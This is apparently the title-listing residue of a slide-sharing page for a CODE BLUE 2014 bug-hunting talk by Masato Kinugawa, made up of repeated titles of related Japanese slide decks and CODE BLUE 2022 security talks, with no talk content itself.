TensorFlow を使った 機械学習ことはじめ (GDG京都 機械学習勉強会)
徹 上野山
 
「モデル検査」のススメ (ゲームシナリオ進行編)
「モデル検査」のススメ (ゲームシナリオ進行編)「モデル検査」のススメ (ゲームシナリオ進行編)
「モデル検査」のススメ (ゲームシナリオ進行編)
Masaru Nagaku
 
Recent Progress in Machine Translation between Japanese and Others, by Mick E...
Recent Progress in Machine Translation between Japanese and Others, by Mick E...Recent Progress in Machine Translation between Japanese and Others, by Mick E...
Recent Progress in Machine Translation between Japanese and Others, by Mick E...
TAUS - The Language Data Network
 
虎の穴ラボ エンジニア採用説明資料
虎の穴ラボ エンジニア採用説明資料虎の穴ラボ エンジニア採用説明資料
虎の穴ラボ エンジニア採用説明資料
虎の穴 開発室
 
虎の穴ラボ エンジニア採用説明資料
虎の穴ラボ エンジニア採用説明資料 虎の穴ラボ エンジニア採用説明資料
虎の穴ラボ エンジニア採用説明資料
虎の穴 開発室
 
虎の穴ラボ エンジニア採用説明資料 .pdf
虎の穴ラボ エンジニア採用説明資料 .pdf虎の穴ラボ エンジニア採用説明資料 .pdf
虎の穴ラボ エンジニア採用説明資料 .pdf
虎の穴 開発室
 
赤外線センサーを使ったインタラクティブコンテンツ
赤外線センサーを使ったインタラクティブコンテンツ赤外線センサーを使ったインタラクティブコンテ���ツ
赤外線センサーを使ったインタラクティブコンテンツ
Takehisa Ikeda
 
gooスマホ部について0707
gooスマホ部について0707gooスマホ部について0707
gooスマホ部について0707
Tadayoshi Senda
 
Why typed
Why typedWhy typed
Why typed
Ichise Masashi
 
Programmer @jc-21 2014/03/29
Programmer @jc-21 2014/03/29Programmer @jc-21 2014/03/29
Programmer @jc-21 2014/03/29
Yuki Higuchi
 
座談会資料(趣旨とあゆみ)配布用 20150321
座談会資料(趣旨とあゆみ)配布用 20150321座談会資料(趣旨とあゆみ)配布用 20150321
座談会資料(趣旨とあゆみ)配布用 20150321
知礼 八子
 
座談会資料(事前配布) 20161217
座談会資料(事前配布) 20161217座談会資料(事前配布) 20161217
座談会資料(事前配布) 20161217
知礼 八子
 
AozoraYomite @InfoTalk 2012/12/21
AozoraYomite @InfoTalk 2012/12/21AozoraYomite @InfoTalk 2012/12/21
AozoraYomite @InfoTalk 2012/12/21
Yuki Higuchi
 

Similar to CODE BLUE 2014 : バグハンターの愉しみ by キヌガワマサト Masato Kinugawa (20)

バグなんて見逃しちゃえ
バグなんて見逃しちゃえバグなんて見逃しちゃえ
バグなんて見逃しちゃえ
 
イマドキWEBデザイン/140712fsumi
イマドキWEBデザイン/140712fsumiイマドキWEBデザイン/140712fsumi
イマドキWEBデザイン/140712fsumi
 
1人ソーシャルゲームを作る肝
1人ソーシャルゲームを作る肝1人ソーシャルゲームを作る肝
1人ソーシャルゲームを作る肝
 
ソーシャルゲームを支える技術 ~ クラウドを活用した高負荷対策
ソーシャルゲームを支える技術 ~ クラウドを活用した高負荷対策ソーシャルゲームを支える技術 ~ クラウドを活用した高負荷対策
ソーシャルゲームを支える技術 ~ クラウドを活用した高負荷対策
 
どたばたかいぎ成果発表
どたばたかいぎ成果発表どたばたかいぎ成果発表
どたばたかいぎ成果発表
 
座談会資料(趣旨とテーマ)配布用 20151003
座談会資料(趣旨とテーマ)配布用 20151003座談会資料(趣旨とテーマ)配布用 20151003
座談会資料(趣旨とテーマ)配布用 20151003
 
TensorFlow を使った 機械学習ことはじめ (GDG京都 機械学習勉強会)
TensorFlow を使った機械学習ことはじめ (GDG京都 機械学習勉強会)TensorFlow を使った機械学習ことはじめ (GDG京都 機械学習勉強会)
TensorFlow を使った 機械学習ことはじめ (GDG京都 機械学習勉強会)
 
「モデル検査」のススメ (ゲームシナリオ進行編)
「モデル検査」のススメ (ゲームシナリオ進行編)「モデル検査」のススメ (ゲームシナリオ進行編)
「モデル検査」のススメ (ゲームシナリオ進行編)
 
Recent Progress in Machine Translation between Japanese and Others, by Mick E...
Recent Progress in Machine Translation between Japanese and Others, by Mick E...Recent Progress in Machine Translation between Japanese and Others, by Mick E...
Recent Progress in Machine Translation between Japanese and Others, by Mick E...
 
虎の穴ラボ エンジニア採用説明資料
虎の穴ラボ エンジニア採用説明資料虎の穴ラボ エンジニア採用説明資料
虎の穴ラボ エンジニア採用説明資料
 
虎の穴ラボ エンジニア採用説明資料
虎の穴ラボ エンジニア採用説明資料 虎の穴ラボ エンジニア採用説明資料
虎の穴ラボ エンジニア採用説明資料
 
虎の穴ラボ エンジニア採用説明資料 .pdf
虎の穴ラボ エンジニア採用説明資料 .pdf虎の穴ラボ エンジニア採用説明資料 .pdf
虎の穴ラボ エンジニア採用説明資料 .pdf
 
赤外線センサーを使ったインタラクティブコンテンツ
赤外線センサーを使ったインタラクティブコンテンツ赤外線センサーを使ったインタラクティブコンテンツ
赤外線センサーを使ったインタラクティブコンテンツ
 
gooスマホ部について0707
gooスマホ部について0707gooスマホ部について0707
gooスマホ部について0707
 
Why typed
Why typedWhy typed
Why typed
 
Programmer @jc-21 2014/03/29
Programmer @jc-21 2014/03/29Programmer @jc-21 2014/03/29
Programmer @jc-21 2014/03/29
 
座談会資料(趣旨とあゆみ)配布用 20150321
座談会資料(趣旨とあゆみ)配布用 20150321座談会資料(趣旨とあゆみ)配布用 20150321
座談会資料(趣旨とあゆみ)配布用 20150321
 
Tokyo r33 beginner
Tokyo r33 beginnerTokyo r33 beginner
Tokyo r33 beginner
 
座談会資料(事前配布) 20161217
座談会資料(事前配布) 20161217座談会資料(事前配布) 20161217
座談会資料(事前配布) 20161217
 
AozoraYomite @InfoTalk 2012/12/21
AozoraYomite @InfoTalk 2012/12/21AozoraYomite @InfoTalk 2012/12/21
AozoraYomite @InfoTalk 2012/12/21
 

More from CODE BLUE

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
CODE BLUE
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl
CODE BLUE
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
CODE BLUE
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22]  「協調された脆弱性開示の現在と未来」国際���なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
CODE BLUE
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
CODE BLUE
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
CODE BLUE
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
CODE BLUE
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
CODE BLUE
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
CODE BLUE
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
CODE BLUE
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
CODE BLUE
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
CODE BLUE
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
CODE BLUE
 

More from CODE BLUE (20)

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
 

CODE BLUE 2014 : バグハンターの愉しみ by キヌガワマサト Masato Kinugawa